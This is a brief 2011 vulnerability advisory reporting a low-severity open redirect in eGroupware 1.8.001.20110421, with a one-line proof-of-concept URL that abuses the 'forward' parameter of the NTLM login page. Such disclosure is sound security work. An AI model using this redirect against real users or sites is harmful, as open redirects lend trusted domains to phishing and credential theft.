------------------------------------------------------------------------ Software................eGroupware 1.8.001.20110421 Vulnerability...........Open Redirect Threat Level............Low (1/5) Download................http://www.egroupware.org/ Discovery Date..........5/19/2011 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ Email...................John Leitch ------------------------------------------------------------------------ --Description-- An open redirect in eGroupware 1.8.001.20110421 can be exploited to redirect users to an arbitrary URL. --PoC-- http://localhost/egroupware/phpgwapi/ntlm/index.php?forward=http://www.autosectools.com/